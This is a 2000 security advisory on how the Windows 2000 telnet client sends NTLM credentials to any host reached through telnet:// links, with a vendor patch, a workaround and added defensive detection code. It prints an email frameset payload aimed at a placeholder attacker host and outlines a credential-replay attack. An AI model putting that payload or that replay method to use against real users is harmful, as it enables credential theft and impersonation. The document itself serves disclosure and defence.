SECURITYVULNS:DOC:685
Sep 15, 2000 - 12:00 a.m.

@stake Advisory: NTLM Replaying via Windows 2000 Telnet Client (A 091400-1)


I wish this could have gone out sooner but there was an issue with
the initial Microsoft patch which we found during our testing. They
subsequently decided to fix the patch which delayed things a bit.
We feel that if a vendor is taking an issue seriously and working
diligently on a patch that we should hold off on vulnerability details
and demonstration code until they have a chance to complete the fix
properly.

Be advised that the URLs included in the Vendor Response section of our
advisory may not have replicated to all the Microsoft web servers yet.

Weld Pond
[email protected]

                        @stake Inc.
                      www.atstake.com

                     Security Advisory

Advisory Name: NTLM Replaying via Windows 2000 Telnet Client (A091400-1)
Release Date: 09/14/2000
Application: Windows 2000 Telnet Client
Platform: Windows 2000
Severity: Attacker can impersonate users on the network
Author: DilDog [[email protected]]
Vendor Status: Vendor has patch
Web: www.atstake.com/research/advisories/2000/a091400-1.txt

Executive Summary:

    The telnet client in Windows 2000 may be launched via e-mail or
web browsing, causing undesirable outbound authentication over the
Internet to an untrusted third party. This can lead to compromised
passwords or stolen credentials.

Overview:

    The console telnet client that is packaged with Windows 2000
performs NTLM authentication by default, assuming that it is going to be
connecting to a Windows 2000 telnet server. This, however, is not
necessarily the case, and it attempts authentication with any host it
contacts. This, combined with the fact that many email and web browser
packages will parse the "telnet://" protocol and launch the telnet client
to the desired host, can lead to outbound NTLM authentications. These
authentications can be cracked to determine passwords, or replayed to
illegitimately access networked resources. The protocol used in the NTLM
telnet transaction is described in detail below, and a proof of concept
tool is provided that demonstrates the negotiation and logs responses from
the client.

Detailed Description:

    Windows 2000 is packaged with a console mode telnet client,
specially designed for connecting to the Windows Telnet Server. Amongst
the modifications to the standard telnet protocol, Microsoft has added a
negotiation type to authenticate via NTLM with the target server, per the
IETF working draft:
http://www.ietf.org/internet-drafts/draft-tso-telnet-auth-enc-05.txt

The NTLM protocol is authentication type 15. The telnet client will
attempt negotiation with any server on the Internet, regardless of zone
control or otherwise, unless NTLM authentication has been disabled in the
telnet client (it is on by default).

Initially, this seems benign, but it becomes a problem when combined with
the fact that Microsoft Internet Explorer, Outlook, Outlook Express, and
Netscape Navigator and Messenger will all open telnet automatically when
they encounter a "telnet://" URL. This allows an attacker to craft an email
in the following format that forces an outbound authentication over any port:

<html>
<frameset rows="100%,*">
<frame src=about:blank>
<frame src=telnet://evil.ip.address:port>
</frameset>
</html>

Note that this attack affects a multitude of HTML parsers, and is not
reliant upon any form of Active Scripting, Javascript or otherwise, to
launch the telnet client to the desired host.
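
Because the trigger is plain markup, a mail or web gateway can look for it without executing anything. The following is an added example, not part of the original advisory: a scanner that reports any URL-bearing attribute whose scheme is telnet. The attribute list, the 192.0.2.10 address and the two obfuscated variants in the sample are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser

# Attributes that make a client load or navigate to a URL with no scripting involved.
URL_ATTRS = {"src", "href", "action", "background", "data", "codebase", "longdesc"}

def scheme(url):
    """Return the URL scheme, lower-cased, as a lenient client would read it."""
    # Leading whitespace/control bytes and embedded tab/CR/LF are ignored by URL parsers.
    cleaned = re.sub(r"^[\x00-\x20]+|[\t\r\n]", "", url)
    match = re.match(r"([A-Za-z][A-Za-z0-9+.-]*):", cleaned)
    return match.group(1).lower() if match else ""

class TelnetLinkFinder(HTMLParser):
    """Collect (tag, attribute, value) for every URL attribute using telnet:."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.hits = []

    def handle_starttag(self, tag, attrs):
        # html.parser lower-cases names, accepts unquoted values and decodes
        # character references, so "tel&#110;et:" is seen as "telnet:".
        for name, value in attrs:
            if name in URL_ATTRS and value and scheme(value) == "telnet":
                self.hits.append((tag, name, value))

def find_telnet_links(html):
    """Return every telnet: reference found in an HTML message body."""
    finder = TelnetLinkFinder()
    finder.feed(html)
    finder.close()
    return finder.hits

# Constructed sample: the advisory's frameset plus two obfuscated variants.
SAMPLE_MAIL = """<html><frameset rows="100%,*">
<frame src=about:blank>
<frame src=telnet://evil.ip.address:port>
</frameset>
<A HREF=" TeLnEt://192.0.2.10:80">x</A>
<img src="tel&#110;et://192.0.2.10">
<a href="http://example.com/?next=telnet://192.0.2.10">ok</a></html>"""
```
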

One of the severe ramifications of this is the ability for the NTLM
challenge/response to be replayed to access a network resource. The
scenario is as follows:

A=attacker
C=client
S=server (network resource to attack)
C has legitimate access to S

  1. 'A' sends evil framed email to 'C'.
  2. 'C' reads email, opens telnet connection to 'A'
  3. 'A' receives telnet connection and makes SMB connection to 'S'.
  4. 'S' receives SMB connection and sends challenge to 'A'
  5. 'A' sends challenge to 'C'.
  6. 'C' receives challenge, encrypts with hash, and sends response to 'A'.
  7. 'A' receives response and sends it to 'S'.
  8. 'S' receives response and authenticates 'A' to access requested SMB
    share.

Another possible attack is that, since the challenge is chosen by
the telnet server, a challenge could be specially chosen to send to the
telnet client such that the response is more easily cracked than with a
random challenge. This effectively removes the extra complexity added by
the challenge response mechanism that one normally encounters while
attempting to crack passwords that were sniffed off of a network
transaction.

The normal NTLM challenge/response negotiation sequence occurs in the
telnet protocol data stream in the following fashion:

Nomenclature

IAC=255,DONT=254,DO=253,WONT=252,WILL=251,SB=250,SE=240
AUTH=37,IS=0,SEND=1,REPLY=2,NAME=3,NTLM=15
DD=32 bit little endian data
DW=16 bit little endian data
DB=8 bit little endian data
US=Unicode string, no extra null terminator
AS=Ansi string, no extra null terminator

Client                          Server
========================        ========================
IAC WILL AUTH
                                IAC SB AUTH
                                SEND NTLM 0x00 IAC SE
IAC SB AUTH
IS NTLM 0x00 0x00
DD 0x00000020 ; Length
DD 0x00000002 ; Type
AS "NTLMSSP\0" ; Signature
DD 0x00000001 ; Sequence #
DD 0xE0008297 ; ?Flags?
DD 0x00000000 ; Padding (room for client challenge?)
DD 0x00000000
DD 0x00000000
DD 0x00000000
IAC SE
                                IAC SB AUTH
                                REPLY NTLM 0x00 0x01
                                DD 0x000000A8 ; Length
                                DD 0x00000002 ; Type
                                AS "NTLMSSP\0" ; Signature
                                DD 0x00000002 ; Sequence#
                                DW 0x0014,0x0014 ; Field length (min/max)
                                DD 0x00000030 ; Offset from start
                                DD 0xE0828295 ; ?Flags?
                                DB 0x01 0x02 0x03 0x04 ; 8 byte
                                DB 0x02 0x03 0x04 0x05 ; Challenge
                                DD 0x00000000 ; Padding
                                DD 0x00000000
                                DW 0x0064,0x0064 ; Next Field length (min/max)
                                DD 0x00000044 ; Offset from start
                                … other fields…
IAC SB AUTH
IS NTLM 0x00 0x02
DD 0x000000B4 ; Length
DD 0x00000002 ; Type
AS "NTLMSSP\0" ; Signature
DD 0x00000003 ; Sequence
DW 0x0018,0x0018 ; NTLM Response Field length (min/max)
DD 0x00000074 ; NTLM Response Offset
DW 0x0018,0x0018 ; LM Response Field length (min/max)
DD 0x0000008C ; LM Response Offset
DW 0x0014,0x0014 ; Domain Name Field length (min/max)
DD 0x00000040 ; Domain Name Offset
DW 0x000C,0x000C ; User Name Field length (min/max)
DD 0x00000054 ; User Name Offset
DW 0x0014,0x0014 ; Machine Name Field length (min/max)
DD 0x00000060 ; Machine Name Offset
DW 0x0010,0x0010 ; ??? Field length (min/max)
DD 0x000000A4 ; ??? Offset
DD 0xE0808295 ; ?Flags?
US "ABCDEGHIJK" ; Domain Name
US "foobar" ; User Name
US "ABCDEGHIJK" ; Machine Name
DB 1,2,3,4,5,6,7,8 ; 24 Bytes of NTLM Response
DB 1,2,3,4,5,6,7,8
DB 1,2,3,4,5,6,7,8
DB 1,2,3,4,5,6,7,8 ; 24 Bytes of LM Response
DB 1,2,3,4,5,6,7,8
DB 1,2,3,4,5,6,7,8
DB 1,2,3,4,5,6,7,8 ; 16 Bytes of Unknown Cruft
DB 1,2,3,4,5,6,7,8
IAC SE
                                IAC SB AUTH
                                REPLY NTLM 0x00 0x03
                                DD 0xFDFFF0FF ; Flags?
                                DB 0x18
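
For detection and incident triage, the exchange listed above can be recognised in a captured telnet stream. The following is an added example, not code from the advisory: it assumes an already reassembled byte stream, takes the field positions from the listing (challenge at byte 24 of the NTLMSSP message, domain and user name fields at bytes 28 and 36), checks only the first authentication type in each block, and uses a constructed sample capture. It reports which account was exposed and whether the server sent a challenge made of one repeated byte.

```python
import struct

IAC, SB, SE, AUTH, NTLM = 255, 250, 240, 37, 15    # nomenclature values from the advisory
CMDS = {0: "IS", 1: "SEND", 2: "REPLY", 3: "NAME"}
SIG = b"NTLMSSP\0"

def subnegotiations(stream):
    """Yield the body of each IAC SB ... IAC SE block, undoing IAC IAC escaping."""
    i, n = 0, len(stream)
    while i + 1 < n:
        if stream[i] != IAC:
            i += 1
        elif stream[i + 1] != SB:
            i += 2                                  # IAC IAC, IAC WILL, IAC DO, ...
        else:
            i, body = i + 2, bytearray()
            while i < n:
                if stream[i:i + 2] == bytes([IAC, SE]):
                    yield bytes(body)
                    i += 2
                    break
                i += 2 if stream[i:i + 2] == b"\xff\xff" else 1
                body.append(stream[i - 1])

def field(msg, pos):
    """Decode a length/max-length/offset field; offsets count from the signature."""
    length, _, off = struct.unpack_from("<HHI", msg, pos)
    return msg[off:off + length].decode("utf-16-le", "replace")

def ntlm_findings(stream):
    """List telnet AUTH subnegotiations that use authentication type 15 (NTLM)."""
    out = []
    for body in subnegotiations(stream):
        if len(body) < 3 or body[0] != AUTH or body[2] != NTLM:
            continue
        hit, at = {"cmd": CMDS.get(body[1], "?")}, body.find(SIG)
        msg = body[at:] if at >= 0 else b""
        seq = struct.unpack_from("<I", msg, 8)[0] if len(msg) >= 32 else 0
        if seq == 2:                                # server challenge, 8 bytes at offset 24
            hit.update(challenge=msg[24:32].hex(), fixed=len(set(msg[24:32])) == 1)
        elif seq == 3 and len(msg) >= 44:           # client response names the exposed account
            hit.update(domain=field(msg, 28), user=field(msg, 36))
        out.append(hit)
    return out

# Constructed capture: WILL AUTH, SEND NTLM, then a REPLY whose challenge is 8 escaped 0xFF bytes.
SAMPLE = (b"\xff\xfb\x25" + b"\xff\xfa\x25\x01\x0f\x00\xff\xf0"
          + b"\xff\xfa\x25\x02\x0f\x00\x01" + struct.pack("<II", 48, 2) + SIG
          + struct.pack("<IHHII", 2, 0, 0, 48, 0xE0828295) + b"\xff" * 16 + bytes(16) + b"\xff\xf0")
```
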

Temporary Solution:

    Run "telnet" at the command prompt, enter "unset ntlm" and then
exit telnet to save your preferences into the registry. You may go so far
as removing the telnet URL type from the registry if you are a proficient
registry hacker, but unsetting the NTLM authentication should be sufficient
until an official patch is available.

Vendor Response:

Microsoft has released a bulletin and patch for this issue.

Bulletin MS00-067
http://www.microsoft.com/technet/security/bulletin/MS00-067.asp

Frequently Asked Questions:
http://www.microsoft.com/technet/security/bulletin/fq00-067.asp

Patch:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=24319

Proof-of-Concept Code:

    This code will act as a rogue telnet server, and send a constant
challenge of 0xFF bytes to any telnet client that connects to it, and it
logs the response to a disk file. The code was written under Linux.

=====================
Content-Description: NTLM Rogue Telnet Server
Content-Disposition: attachment; filename="talkntlm.cpp"
Content-Transfer-Encoding: BASE64
Content-Type: text/plain